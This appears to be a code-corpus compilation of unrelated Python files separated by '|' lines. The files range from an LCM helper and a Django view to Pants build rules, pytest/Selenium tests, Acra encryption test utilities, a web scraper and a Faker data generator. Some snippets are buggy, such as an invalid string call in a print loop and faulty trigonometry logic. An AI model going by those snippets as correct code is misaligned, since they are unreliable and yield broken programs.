|
from gcd_simple import gcd
def lcm_simple(num1, num2):
return (num1 * num2) // gcd(num1, num2)
# 動作確認
a = 6
b = 9
print(lcm_simple(a, b))
lst = [6, 21, 12, 33]
lcm = 1
for a in lst:
lcm = lcm_simple(lcm, a)
print(lcm)
|
import math
def Trig(opposite, hypotenuse, adjacent):
list1 = [opposite, hypotenuse, adjacent]
hypo = 'No'
oppo = 'No'
adj = 'No'
print(list1)
print(oppo)
print(hypo)
print(adj)
for i in range(1,4,1):
if opposite > 0:
oppo = 'yes'
elif hypotenuse > 0:
hypo = 'yes'
elif adjacent > 0:
adj = 'yes'
print(list1)
print(oppo)
print(hypo)
print(adj)
'''
if hypo == 'No':
answer = math.sqrt(list1[0]*list1[0] + list1[1]*list1[1])
print('Opposite:', list1[0])
print('Adjacent:', list1[1])
print('Hypotenuse:', answer)
print('Hypotenuse:', answer)
elif hypo == 'yes' and oppo == 'No':
answer = math.sqrt(list1[0]*list1[0] - list1[1]*list1[1])
print('Opposite:', answer)
print('Adjacent:', list1[1])
print('Hypotenuse:', list1[0])
elif hypo == 'yes' and oppo == 'yes':
answer = math.sqrt(list1[1]*list1[1] - list1[0]*list1[0])
print('Opposite:', list1[0])
print('Adjacent:', answer)
print('Hypotenuse:', list1[1])
'''
Trig(20,30,0)
|
for i in range (1,5):
print("<"(i-5)+">") |
from django.views.generic import TemplateView
from generic.mixins import CategoryListMixin
class HowToBuyView(TemplateView, CategoryListMixin):
template_name = "howtobuy.html" |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import itertools
import logging
import os
from dataclasses import dataclass
from pathlib import PurePath
from typing import Iterable
from pants.build_graph.address import Address
from pants.engine.collection import DeduplicatedCollection
from pants.engine.engine_aware import EngineAwareParameter
from pants.engine.fs import PathGlobs, Paths
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import Target
from pants.option.option_types import StrListOption
from pants.option.subsystem import Subsystem
from pants.util.docutil import doc_url
from pants.util.frozendict import FrozenDict
from pants.util.logging import LogLevel
from pants.util.memo import memoized_method
from pants.util.strutil import softwrap
logger = logging.getLogger(__name__)
@dataclass(frozen=True, order=True)
class SourceRoot:
# Relative path from the buildroot. Note that a source root at the buildroot
# is represented as ".".
path: str
@dataclass(frozen=True)
class OptionalSourceRoot:
source_root: SourceRoot | None
class SourceRootError(Exception):
"""An error related to SourceRoot computation."""
def __init__(self, msg: str):
super().__init__(f"{msg}See {doc_url('source-roots')} for how to define source roots.")
class InvalidSourceRootPatternError(SourceRootError):
"""Indicates an invalid pattern was provided."""
class InvalidMarkerFileError(SourceRootError):
"""Indicates an invalid marker file was provided."""
class NoSourceRootError(SourceRootError):
"""Indicates we failed to map a source file to a source root."""
def __init__(self, path: str | PurePath, extra_msg: str = ""):
super().__init__(f"No source root found for `{path}`. {extra_msg}")
# We perform pattern matching against absolute paths, where "/" represents the repo root.
_repo_root = PurePath(os.path.sep)
@dataclass(frozen=True)
class SourceRootPatternMatcher:
root_patterns: tuple[str, ...]
def __post_init__(self) -> None:
for root_pattern in self.root_patterns:
if ".." in root_pattern.split(os.path.sep):
raise InvalidSourceRootPatternError(
f"`..` disallowed in source root pattern: {root_pattern}."
)
def get_patterns(self) -> tuple[str, ...]:
return tuple(self.root_patterns)
def matches_root_patterns(self, relpath: PurePath) -> bool:
"""Does this putative root match a pattern?"""
# Note: This is currently O(n) where n is the number of patterns, which
# we expect to be small. We can optimize if it becomes necessary.
putative_root = _repo_root / relpath
for pattern in self.root_patterns:
if putative_root.match(pattern):
return True
return False
class SourceRootConfig(Subsystem):
options_scope = "source"
help = "Configuration for roots of source trees."
DEFAULT_ROOT_PATTERNS = [
"/",
"src",
"src/python",
"src/py",
"src/thrift",
"src/protobuf",
"src/protos",
"src/scala",
"src/java",
]
root_patterns = StrListOption(
default=DEFAULT_ROOT_PATTERNS,
help=softwrap(
f"""
A list of source root suffixes.
A directory with this suffix will be considered a potential source root.
E.g., `src/python` will match `<buildroot>/src/python`, `<buildroot>/project1/src/python`
etc.
Prepend a `/` to anchor the match at the buildroot.
E.g., `/src/python` will match `<buildroot>/src/python` but not `<buildroot>/project1/src/python`.
A `*` wildcard will match a single path segment,
E.g., `src/*` will match `<buildroot>/src/python` and `<buildroot>/src/rust`.
Use `/` to signify that the buildroot itself is a source root.
See {doc_url('source-roots')}.
"""
),
advanced=True,
metavar='["pattern1", "pattern2", ...]',
)
marker_filenames = StrListOption(
help=softwrap(
"""
The presence of a file of this name in a directory indicates that the directory
is a source root. The content of the file doesn't matter, and may be empty.
Useful when you can't or don't wish to centrally enumerate source roots via
`root_patterns`.
"""
),
advanced=True,
metavar="filename",
)
@memoized_method
def get_pattern_matcher(self) -> SourceRootPatternMatcher:
return SourceRootPatternMatcher(self.root_patterns)
@dataclass(frozen=True)
class SourceRootsRequest:
"""Find the source roots for the given files and/or dirs."""
files: tuple[PurePath, ...]
dirs: tuple[PurePath, ...]
def __init__(self, files: Iterable[PurePath], dirs: Iterable[PurePath]) -> None:
object.__setattr__(self, "files", tuple(sorted(files)))
object.__setattr__(self, "dirs", tuple(sorted(dirs)))
self.__post_init__()
def __post_init__(self) -> None:
for path in itertools.chain(self.files, self.dirs):
if ".." in str(path).split(os.path.sep):
raise ValueError(f"SourceRootRequest cannot contain `..` segment: {path}")
if path.is_absolute():
raise ValueError(f"SourceRootRequest path must be relative: {path}")
@classmethod
def for_files(cls, file_paths: Iterable[str]) -> SourceRootsRequest:
"""Create a request for the source root for the given file."""
return cls({PurePath(file_path) for file_path in file_paths}, ())
@dataclass(frozen=True)
class SourceRootRequest(EngineAwareParameter):
"""Find the source root for the given path.
If you have multiple paths, particularly if many of them share parent directories, you'll get
better performance with a `SourceRootsRequest` (see above) instead.
"""
path: PurePath
def __post_init__(self) -> None:
if ".." in str(self.path).split(os.path.sep):
raise ValueError(f"SourceRootRequest cannot contain `..` segment: {self.path}")
if self.path.is_absolute():
raise ValueError(f"SourceRootRequest path must be relative: {self.path}")
@classmethod
def for_file(cls, file_path: str) -> SourceRootRequest:
"""Create a request for the source root for the given file."""
# The file itself cannot be a source root, so we may as well start the search
# from its enclosing directory, and save on some superfluous checking.
return cls(PurePath(file_path).parent)
@classmethod
def for_address(cls, address: Address) -> SourceRootRequest:
# Note that we don't use for_file() here because the spec_path is a directory.
return cls(PurePath(address.spec_path))
@classmethod
def for_target(cls, target: Target) -> SourceRootRequest:
return cls.for_address(target.address)
def debug_hint(self) -> str:
return str(self.path)
@dataclass(frozen=True)
class SourceRootsResult:
path_to_root: FrozenDict[PurePath, SourceRoot]
@dataclass(frozen=True)
class OptionalSourceRootsResult:
path_to_optional_root: FrozenDict[PurePath, OptionalSourceRoot]
@rule
async def get_optional_source_roots(
source_roots_request: SourceRootsRequest,
) -> OptionalSourceRootsResult:
"""Rule to request source roots that may not exist."""
# A file cannot be a source root, so request for its parent.
# In the typical case, where we have multiple files with the same parent, this can
# dramatically cut down on the number of engine requests.
dirs: set[PurePath] = set(source_roots_request.dirs)
file_to_dir: dict[PurePath, PurePath] = {
file: file.parent for file in source_roots_request.files
}
dirs.update(file_to_dir.values())
roots = await MultiGet(Get(OptionalSourceRoot, SourceRootRequest(d)) for d in dirs)
dir_to_root = dict(zip(dirs, roots))
path_to_optional_root: dict[PurePath, OptionalSourceRoot] = {}
for d in source_roots_request.dirs:
path_to_optional_root[d] = dir_to_root[d]
for f, d in file_to_dir.items():
path_to_optional_root[f] = dir_to_root[d]
return OptionalSourceRootsResult(path_to_optional_root=FrozenDict(path_to_optional_root))
@rule
async def get_source_roots(source_roots_request: SourceRootsRequest) -> SourceRootsResult:
"""Convenience rule to allow callers to request SourceRoots that must exist.
That way callers don't have to unpack OptionalSourceRoots if they know they expect a SourceRoot
to exist and are willing to error if it doesn't.
"""
osrr = await Get(OptionalSourceRootsResult, SourceRootsRequest, source_roots_request)
path_to_root = {}
for path, osr in osrr.path_to_optional_root.items():
if osr.source_root is None:
raise NoSourceRootError(path)
path_to_root[path] = osr.source_root
return SourceRootsResult(path_to_root=FrozenDict(path_to_root))
@rule
async def get_optional_source_root(
source_root_request: SourceRootRequest, source_root_config: SourceRootConfig
) -> OptionalSourceRoot:
"""Rule to request a SourceRoot that may not exist."""
pattern_matcher = source_root_config.get_pattern_matcher()
path = source_root_request.path
# Check if the requested path itself is a source root.
# A) Does it match a pattern?
if pattern_matcher.matches_root_patterns(path):
return OptionalSourceRoot(SourceRoot(str(path)))
# B) Does it contain a marker file?
marker_filenames = source_root_config.marker_filenames
if marker_filenames:
for marker_filename in marker_filenames:
if (
os.path.basename(marker_filename) != marker_filename
or "*" in marker_filename
or "!" in marker_filename
):
raise InvalidMarkerFileError(
f"Marker filename must be a base name: {marker_filename}"
)
paths = await Get(Paths, PathGlobs([str(path / mf) for mf in marker_filenames]))
if len(paths.files) > 0:
return OptionalSourceRoot(SourceRoot(str(path)))
# The requested path itself is not a source root, but maybe its parent is.
if str(path) != ".":
return await Get(OptionalSourceRoot, SourceRootRequest(path.parent))
# The requested path is not under a source root.
return OptionalSourceRoot(None)
@rule
async def get_source_root(source_root_request: SourceRootRequest) -> SourceRoot:
"""Convenience rule to allow callers to request a SourceRoot directly.
That way callers don't have to unpack an OptionalSourceRoot if they know they expect a
SourceRoot to exist and are willing to error if it doesn't.
"""
optional_source_root = await Get(OptionalSourceRoot, SourceRootRequest, source_root_request)
if optional_source_root.source_root is None:
raise NoSourceRootError(source_root_request.path)
return optional_source_root.source_root
class AllSourceRoots(DeduplicatedCollection[SourceRoot]):
sort_input = True
@rule(desc="Compute all source roots", level=LogLevel.DEBUG)
async def all_roots(source_root_config: SourceRootConfig) -> AllSourceRoots:
source_root_pattern_matcher = source_root_config.get_pattern_matcher()
# Create globs corresponding to all source root patterns.
pattern_matches: set[str] = set()
for path in source_root_pattern_matcher.get_patterns():
if path == "/":
pattern_matches.add("**")
elif path.startswith("/"):
pattern_matches.add(f"{path[1:]}/")
else:
pattern_matches.add(f"**/{path}/")
# Create globs for any marker files.
marker_file_matches: set[str] = set()
for marker_filename in source_root_config.marker_filenames:
marker_file_matches.add(f"**/{marker_filename}")
# Match the patterns against actual files, to find the roots that actually exist.
pattern_paths, marker_paths = await MultiGet(
Get(Paths, PathGlobs(globs=sorted(pattern_matches))),
Get(Paths, PathGlobs(globs=sorted(marker_file_matches))),
)
responses = await MultiGet(
itertools.chain(
(Get(OptionalSourceRoot, SourceRootRequest(PurePath(d))) for d in pattern_paths.dirs),
# We don't technically need to issue a SourceRootRequest for the marker files,
# since we know that their immediately enclosing dir is a source root by definition.
# However we may as well verify this formally, so that we're not replicating that
# logic here.
(Get(OptionalSourceRoot, SourceRootRequest(PurePath(f))) for f in marker_paths.files),
)
)
all_source_roots = {
response.source_root for response in responses if response.source_root is not None
}
return AllSourceRoots(all_source_roots)
def rules():
return collect_rules()
|
#!/usr/bin/env python
__author__ = 'zhengandy'
import sys, os
sys.path.extend(os.path.dirname(os.path.abspath(__file__)))
print os.path.dirname(os.path.abspath(__file__))
from argparse import ArgumentParser
ap = ArgumentParser(
#prog = __file__,
description = 'xiaowang api unittest',
)
ap.add_argument('number', action="store",type=int, nargs='?', default=-1)
args = ap.parse_args()
import os
os.environ.setdefault('UT_ITEM', str(args.number))
from MileStone4TestCase import testRunner
from MileStone4TestCase import TestCase
testRunner.main() |
import time, pytest,sys,os
sys.path.insert(1,os.path.abspath(os.path.join(os.path.dirname( __file__ ),'..','..','lib')))
from clsCommon import Common
import clsTestService
import enums
from localSettings import *
import localSettings
from utilityTestFunc import *
class Test:
#================================================================================================================================
# @Author: Michal Zomper
# Test Name: Categories - Enable / Disable Inherit permissions
# Test description:
# create 2 categories, 1 parent and 1 sub category
# Add member with different permissions to parent category
# 1. Go so sub category member tab and click on 'Inherit permissions from parent category' -> Click on 'Yes' in the pop-up message
# All the parent category's members are added to the sub category according to their permissions there.
# You should Not be able to edit the member's permissions or to remove them or to add new members as long as the inherit option is checked.
#
# 2. Go so sub category member tab and UnCheck the option : 'Inherit permissions from parent category' - > Click on 'Yes' in the pop-up message
# The parent category's members should be removed from the category.
# The members list should be as it was before the inheriting.
#================================================================================================================================
testNum = "719"
supported_platforms = clsTestService.updatePlatforms(testNum)
status = "Pass"
timeout_accured = "False"
driver = None
common = None
# Test variables
parentCategoryName = None
subCategoryName = None
description = "description"
tags = "tags,"
userName1 = "Automation_User_1"
userName2 = "Automation_User_2"
userName3 = "Automation_User_3"
userName4 = "Automation_User_4"
#run test as different instances on all the supported platforms
@pytest.fixture(scope='module',params=supported_platforms)
def driverFix(self,request):
return request.param
def test_01(self,driverFix,env):
#write to log we started the test
logStartTest(self,driverFix)
try:
############################# TEST SETUP ###############################
#capture test start time
self.startTime = time.time()
#initialize all the basic vars and start playing
self,self.driver = clsTestService.initializeAndLoginAsUser(self, driverFix)
self.common = Common(self.driver)
self.parentCategoryName = clsTestService.addGuidToString('Category - Inherit permissions', self.testNum)
self.subCategoryName = clsTestService.addGuidToString('Sub Category - Inherit permissions', self.testNum)
self.membersList =[(self.userName1,enums.CategoryMemberPermission.MEMBER),
(self.userName2,enums.CategoryMemberPermission.MODERATOR),
(self.userName3,enums.CategoryMemberPermission.CONTRIBUTOR)]
########################## TEST STEPS - MAIN FLOW ######################
writeToLog("INFO","Step 1: Going to create parent category")
self.common.apiClientSession.startCurrentApiClientSession()
parentId = self.common.apiClientSession.getParentId('galleries')
if self.common.apiClientSession.createCategory(parentId, localSettings.LOCAL_SETTINGS_LOGIN_USERNAME, self.parentCategoryName, self.description) == False:
self.status = "Fail"
writeToLog("INFO","Step 1: FAILED to create parent category")
return
writeToLog("INFO","Step 2: Going to create sub category")
self.common.apiClientSession.startCurrentApiClientSession()
parentId = self.common.apiClientSession.getCategoryByName(self.parentCategoryName)
if self.common.apiClientSession.createCategory(parentId, localSettings.LOCAL_SETTINGS_LOGIN_USERNAME, self.subCategoryName, self.description) == False:
self.status = "Fail"
writeToLog("INFO","Step 2: FAILED to create sub category")
return
writeToLog("INFO","Step 3: Going to clear cache")
if self.common.admin.clearCache() == False:
self.status = "Fail"
writeToLog("INFO","Step 3: FAILED to clear cache")
return
writeToLog("INFO","Step 4: Going navigate to home page")
if self.common.home.navigateToHomePage(forceNavigate=True) == False:
self.status = "Fail"
writeToLog("INFO","Step 4: FAILED navigate to home page")
return
writeToLog("INFO","Step 5: Going to add members to parent category")
if self.common.category.addMembersToCategory(self.parentCategoryName, self.membersList) == False:
self.status = "Fail"
writeToLog("INFO","Step 5: FAILED to add members to parent category")
return
writeToLog("INFO","Step 6: Going navigate to sub category edit page")
if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName) == False:
self.status = "Fail"
writeToLog("INFO","Step 6: FAILED navigate to sub category edit page")
return
writeToLog("INFO","Step 7: Going to inherit permissions from parent category")
if self.common.category.inheritPermissionsFormCategory() == False:
self.status = "Fail"
writeToLog("INFO","Step 7: FAILED to inherit permissions from parent category")
return
sleep(3)
writeToLog("INFO","Step 8: Going navigate to sub category edit page")
if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName, forcrNavigate=True) == False:
self.status = "Fail"
writeToLog("INFO","Step 8: FAILED navigate to sub category edit page")
return
writeToLog("INFO","Step 9: Going to verify that inherit members form parent category display in sub category member tab after inherit")
if self.common.category.verifyMembersPermissionsInMemberTable(self.membersList) == False:
self.status = "Fail"
writeToLog("INFO","Step 9: FAILED to verify that add members form parent category display in sub category member tab after inherit permissions")
return
writeToLog("INFO","Step 10: Going to try to delete member")
if self.common.channel.deleteChannelMember(self.userName2) == True:
self.status = "Fail"
writeToLog("INFO","Step 10: FAILED, user delete member although after inherit members permissions user can NOT delete member")
return
writeToLog("INFO","Step 10: preview step failed as expected: user can NOT delete members after inherit members permissions")
sleep(3)
writeToLog("INFO","Step 11: Going to try and add member to sub category")
if self.common.category.addMemberToCategory(self.subCategoryName, self.userName2, permission=enums.CategoryMemberPermission.MEMBER, forceNavigate=False) == True:
self.status = "Fail"
writeToLog("INFO","Step 11: FAILED, user added member to sub category although after inherit members permissions user can NOT add member ")
return
writeToLog("INFO","Step 11: preview step failed as expected: user can NOT add members after inherit members permissions")
sleep(3)
writeToLog("INFO","Step 12: Going to try and change member permission")
if self.common.category.editCategoryMemberPermission(self.userName1, permission = enums.CategoryMemberPermission.MODERATOR) == True:
self.status = "Fail"
writeToLog("INFO","Step 12: FAILED, user change member permission although after inherit members permissions user can NOT change member permission")
return
writeToLog("INFO","Step 12: preview step failed as expected: user can NOT change member permission after inherit members permissions")
sleep(3)
writeToLog("INFO","Step 13: Going to try and set member as owner")
if self.common.channel.setChannelMemberAsOwner(self.userName3) == True:
self.status = "Fail"
writeToLog("INFO","Step 13: FAILED, user set member as owner although after inherit members permissions user can NOT set member as owner")
return
writeToLog("INFO","Step 13: preview step failed as expected: user can NOT set member as owner after inherit members permissions")
sleep(3)
writeToLog("INFO","Step 14: Going navigate to sub category edit page")
if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName) == False:
self.status = "Fail"
writeToLog("INFO","Step 14: FAILED navigate to sub category edit page")
return
writeToLog("INFO","Step 15: Going to disable inherit permissions from parent category")
if self.common.category.inheritPermissionsFormCategory() == False:
self.status = "Fail"
writeToLog("INFO","Step 15: FAILED to disable inherit permissions from parent category")
return
writeToLog("INFO","Step 16: Going navigate to sub category edit page")
if self.common.category.navigateToEditSubCategoryPage(self.parentCategoryName, self.subCategoryName) == False:
self.status = "Fail"
writeToLog("INFO","Step 16: FAILED navigate to sub category edit page")
return
writeToLog("INFO","Step 17: Going navigate to sub category member tab")
if self.common.category.navigateToCategoryMembersTab() == False:
self.status = "Fail"
writeToLog("INFO","Step 17: FAILED navigate to sub category member tab")
return
writeToLog("INFO","Step 18: Going to verify that inherit member '" + self.userName1 + "' form parent category erased from sub category member tab after disable inherit permissions")
if self.common.category.verifyMemberPermissionsInMemberTable(self.userName1,enums.CategoryMemberPermission.MEMBER)== True:
self.status = "Fail"
writeToLog("INFO","Step 18: FAILED, member '" + self.userName1 + "' still display in sub category member tab after disable inherit permissions")
return
writeToLog("INFO","Step 18: preview step failed as expected: user doesn't need to a member in sub category after disable inherit members permissions")
writeToLog("INFO","Step 19: Going to verify that inherit member '" + self.userName2 + "' form parent category erased from sub category member tab after disable inherit permissions")
if self.common.category.verifyMemberPermissionsInMemberTable(self.userName2,enums.CategoryMemberPermission.MODERATOR)== True:
self.status = "Fail"
writeToLog("INFO","Step 19: FAILED, member '" + self.userName2 + "' still display in sub category member tab after disable inherit permissions")
return
writeToLog("INFO","Step 19: preview step failed as expected: user doesn't need to a member in sub category after disable inherit members permissions")
writeToLog("INFO","Step 20: Going to verify that inherit member '" + self.userName3 + "' form parent category erased from sub category member tab after disable inherit permissions")
if self.common.category.verifyMemberPermissionsInMemberTable(self.userName3,enums.CategoryMemberPermission.CONTRIBUTOR)== True:
self.status = "Fail"
writeToLog("INFO","Step 20: FAILED, member '" + self.userName3 + "' still display in sub category member tab after disable inherit permissions")
return
writeToLog("INFO","Step 20: preview step failed as expected: user doesn't need to a member in sub category after disable inherit members permissions")
#########################################################################
writeToLog("INFO","TEST PASSED: 'Categories - Enable / Disable Inherit permissions' was done successfully")
# If an exception happened we need to handle it and fail the test
except Exception as inst:
self.status = clsTestService.handleException(self,inst,self.startTime)
########################### TEST TEARDOWN ###########################
def teardown_method(self,method):
try:
self.common.handleTestFail(self.status)
writeToLog("INFO","**************** Starting: teardown_method **************** ")
self.common.apiClientSession.deleteCategory(self.subCategoryName)
self.common.apiClientSession.deleteCategory(self.parentCategoryName)
writeToLog("INFO","**************** Ended: teardown_method *******************")
except:
pass
clsTestService.basicTearDown(self)
#write to log we finished the test
logFinishedTest(self,self.startTime)
assert (self.status == "Pass")
pytest.main('test_' + testNum + '.py --tb=line') |
# -*- coding: utf-8 -*-
# @Author : WangNing
# @Email : 3190193395@qq.com
# @File : script_variables.py
# @Software: PyCharm
# 生成脚本时,相关变量的存储
# 脚本预备:导入包
code_prepares = """#encoding=utf-8
import unittest, requests
from core.db_manager import *
import os, sys,json"""
# 脚本头部[需要连接数据库(有依赖数据)]:class, setup
code_head_with_db = '''
class %s(unittest.TestCase):
"""%s"""
def setUp(self):
self.dbd = DBManager()
self.base_url = "%s"
'''
# 脚本头部[不需要连接数据库]:class, setup
code_head = '''
class %s(unittest.TestCase):
"""%s"""
def setUp(self):
self.base_url = "%s"
'''
# 脚本结束
code_end = """
"""
# 脚本结束(带数据库连接)
code_end_with_db = """
def tearDown(self):
self.dbd.close_connect()
"""
# 结束
final_code = '''
if __name__ == '__main__':
unittest.main()
'''
# post方法
post_code = '''
def test_%s(self):
"""%s"""
%s
r = requests.post(self.base_url, data = json.dumps(payload))
result = r.json()
self.assertEqual(r.status_code, 200)
%s
'''
# get方法
get_code = '''\n
def test_%s(self):
"""%s"""
%s
r = requests.get(self.base_url + str(payload))
result = r.json()
self.assertEqual(r.status_code, 200)
%s
'''
# 校验
check_code = '''
check_point = %s
for key,value in check_point.items():
self.assertEqual(result[key], value, msg = u"字段【{}】: expection: {}, reality: {}".format(key, value, result[key]))
'''
|
# coding: utf-8
import json
import os
import subprocess
import sys
import tempfile
import shutil
from base64 import b64decode
from pythemis import smessage, scell
import yaml
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
abs_path = lambda x: os.path.join(BASE_DIR, x)
TEMP_DATA_GENERATED = 'TEST_RANDOM_DATA_FOLDER_GENERATE'
TEMP_DATA_FOLDER_VARNAME = 'TEST_RANDOM_DATA_FOLDER'
def send_signal_by_process_name(name, signal, timeout=1):
try:
output = subprocess.check_output(['pidof', name], timeout=timeout)
except subprocess.CalledProcessError:
return
output = output.strip().decode('utf-8').split(' ')
for pid in output:
os.kill(int(pid), signal)
def get_encryptor_config(new_path):
return os.environ.get(
'TEST_ENCRYPTOR_DEFAULT_CONFIG', new_path)
def get_test_encryptor_config(config_path):
return os.environ.get(
'TEST_ENCRYPTOR_TEST_CONFIG',
get_encryptor_config(config_path) + '.test')
def clean_test_data():
"""remove temporary created folder and test files if it was generated"""
folder = os.environ.get(TEMP_DATA_GENERATED)
if folder:
print("clean temporary folder <{}>".format(folder))
shutil.rmtree(folder)
def safe_string(str_or_bytes, encoding='utf-8'):
if isinstance(str_or_bytes, str):
return str_or_bytes
return str_or_bytes.decode(encoding)
def get_random_data_files():
folder = os.environ.get(TEMP_DATA_FOLDER_VARNAME)
if not folder:
folder = tempfile.mkdtemp(None, 'test_data', None)
# set temp folder before call generator
os.environ.setdefault(TEMP_DATA_FOLDER_VARNAME, folder)
# remember that we generated from script to cleanup at end
os.environ.setdefault(TEMP_DATA_GENERATED, folder)
print("You didn't set {} env var. Test data will be generated to <{}> "
"folder and removed at end".format(
TEMP_DATA_FOLDER_VARNAME, folder))
if not os.path.exists(folder) or len(os.listdir(folder)) == 0:
command = [sys.executable, abs_path('tests/generate_random_data.py')]
print('call {}'.format(' '.join(command)))
subprocess.check_call(command, env=os.environ, cwd=os.getcwd())
return [os.path.join(folder, i) for i in os.listdir(folder)]
def load_random_data_config():
with open(abs_path('tests/random_data_config.json'), 'r') as f:
return json.load(f)
def load_yaml_config(path):
with open(abs_path(path), 'r') as f:
config = yaml.safe_load(f)
return config
def dump_yaml_config(config, path):
with open(abs_path(path), 'w') as f:
yaml.dump(config, f)
def load_default_config(service_name):
config = load_yaml_config('configs/{}.yaml'.format(service_name))
# convert empty values to empty strings to avoid pass them to Popen as
# "None" string value
# every config has version but service's don't have such parameter and will exit with error if we will
# provide unexpected parameter
# when services parse configs they ignore unknown parameters and not down for that
skip_keys = ['version']
for skip in skip_keys:
del config[skip]
for key in config:
if config[key] is None:
config[key] = ''
return config
def read_key(key_id, public, keys_dir='.acrakeys'):
"""Reads key from keystore with acra-keys."""
args = ['./acra-keys', 'read', '--keys_dir={}'.format(keys_dir)]
if public:
args.append('--public')
else:
args.append('--private')
args.append(key_id)
return subprocess.check_output(args)
def destroy_key(key_id, keys_dir='.acrakeys'):
"""Destroys key in the keystore with acra-keys."""
args = ['./acra-keys', 'destroy', '--keys_dir={}'.format(keys_dir)]
args.append(key_id)
return subprocess.check_output(args)
def destroy_connector_transport(client_id, keys_dir='.acrakeys'):
return destroy_key('client/{}/transport/connector'.format(client_id),
keys_dir=keys_dir)
def destroy_server_transport(client_id, keys_dir='.acrakeys'):
return destroy_key('client/{}/transport/server'.format(client_id),
keys_dir=keys_dir)
def read_storage_public_key(client_id, keys_dir='.acrakeys'):
return read_key('client/{}/storage'.format(client_id),
public=True, keys_dir=keys_dir)
def read_zone_public_key(zone_id, keys_dir='.acrakeys'):
return read_key('zone/{}/storage'.format(zone_id),
public=True, keys_dir=keys_dir)
def decrypt_acrastruct(data, private_key, client_id=None, zone_id=None):
public_key = data[8:8+45]
encrypted_symmetric = data[8+45:8+45+84]
smessage_decryptor = smessage.SMessage(private_key, public_key)
symmetric = smessage_decryptor.unwrap(encrypted_symmetric)
encrypted_data = data[8+45+84+8:]
if zone_id:
return scell.SCellSeal(symmetric).decrypt(encrypted_data, zone_id)
else:
return scell.SCellSeal(symmetric).decrypt(encrypted_data)
def read_storage_private_key(keys_folder, key_id):
return read_key('client/{}/storage'.format(key_id),
public=False, keys_dir=keys_folder)
def read_zone_private_key(keys_folder, key_id):
return read_key('zone/{}/storage'.format(key_id),
public=False, keys_dir=keys_folder)
def read_poison_public_key(keys_dir):
return read_key('poison-record', public=True, keys_dir=keys_dir)
def read_poison_private_key(keys_dir):
return read_key('poison-record', public=False, keys_dir=keys_dir)
def prepare_encryptor_config(zone_id, config_path):
with open(config_path, 'r') as f:
config = yaml.safe_load(f)
for table in config['schemas']:
for column in table['encrypted']:
if 'zone_id' in column:
column['zone_id'] = zone_id
with open(get_test_encryptor_config(config_path), 'w') as f:
yaml.dump(config, f)
def get_bool_env(var, default=False):
"""Read a boolean value from environment variable."""
value = os.environ.get(var, None)
if not value:
return default
value = value.lower()
if value in ['no', 'n', 'false']:
return False
if value in ['yes', 'y', 'true']:
return True
# Dunno, maybe this is an integer, use C convention
return int(value) != 0
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from chloroform.views import (
ChloroformView,
ChloroformSuccessView,
)
urlpatterns = [
url('^$',
ChloroformView.as_view(),
name='default-chloroform'),
url('^success/$',
ChloroformSuccessView.as_view(),
name='default-chloroform-success'),
url('^(?P<configuration>\w+)/$',
ChloroformView.as_view(),
name='chloroform'),
url('^(?P<configuration>\w+)/success/$',
ChloroformSuccessView.as_view(),
name='chloroform-success'),
]
|
# Able to acces price for one real estate
import requests
from bs4 import BeautifulSoup
r = requests.get("http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c= r.content
soup= BeautifulSoup(c, "html.parser")
alll= soup.find_all("div", {"class":"propertyRow"})
#To remove new lines and spacesss we used replace
#To get text we used text
x= alll[0].find("h4", {"class": "propPrice"}).text.replace("\n","").replace(" ", "")
#x.replace("\n","").replace(" ", "")
print(x) |
class Antibiotic:
name = ""
klass = ""
atc_code = ""
category = ""
eml = False
def __init__(self, name=name, klass=klass,
atc_code=atc_code, category=category, eml=eml):
self.name = name
self.klass = klass
self.atc_code = atc_code
self.category = category
self.eml = eml
def print(self):
print("""name: %s
class: %s
atc_code: %s
category: %s
eml: %s""" % (
self.name,
self.klass,
self.atc_code,
self.category,
self.eml))
def load_antibiotics():
with open("antibiotics.csv") as antibiotics_file:
file_contents = antibiotics_file.read()
lines = file_contents.split("\n")
antibiotics_list = []
for line in lines:
try:
vals = line.split(",")
name = vals[0]
klass = vals[1]
atc_code = vals[2]
category = vals[3]
eml = vals[4]
antibiotic = Antibiotic(
name=name,
klass=klass,
category=category,
atc_code=atc_code,
eml=eml)
antibiotics_list.append(antibiotic)
except Exception as ex:
pass
for antibiotic in antibiotics_list:
antibiotic.print()
"""
Don't worry too much about what this means. This is just the "python" way
of setting the entry point of the file. When you run this python file
as is (versus including it from another file), it will run this portion.
"""
if __name__ == "__main__":
load_antibiotics()
|
import asyncio
import binascii
class WrappedProtocol(asyncio.Protocol):
def __init__(self, protocol, loop):
self._protocol = protocol
self._loop = loop
self._buffer = bytearray()
def __getattr__(self, attr):
if attr in self.__dict__:
return getattr(self, attr)
return getattr(self._protocol, attr)
def data_received(self, data):
self._buffer.extend(data)
while True:
start = self._buffer.find(b'<')
end = self._buffer.find(b'>')
if start == -1 or end == -1:
# No complete message in buffer
break
payload = binascii.unhexlify(self._buffer[start+1:end])
del self._buffer[:end+1]
self._protocol.data_received(payload)
async def make_isotpserver_transport(protocol_factory, host, port, loop):
protocol = protocol_factory()
transport, _ = await loop.create_connection(
lambda: WrappedProtocol(protocol, loop), host, port)
# Monkey patch the write method in transport
raw_write = transport.write
transport.write = lambda payload: raw_write(
b'<' + binascii.hexlify(payload) + b'>')
return transport, protocol
|
with open('config_file.txt') as configFile:
lines=configFile.readlines()
configs={}
for line in lines:
configs[line.rstrip('\n').split(':')[0]]=line.rstrip('\n').split(':')[1]
print configs
print "File read complete" |
from faker import Faker # Before running this script, run `pip install faker`
from numpy.random import normal
import numpy as np
# First, let me generate some fake data...
fake = Faker()
students = []
for i in range(100):
students.append({
'first_name': fake.first_name(),
'last_name': fake.last_name(),
'address': fake.address(),
'maths': np.clip(normal(3, .5), 0, 4),
'linguistics': np.clip(normal(3, .5), 0, 4),
'psychology': np.clip(normal(3, .5), 0, 4)
})
# Now, let's try out some things!
first_names = []
last_names = []
addresses = []
maths_grades = []
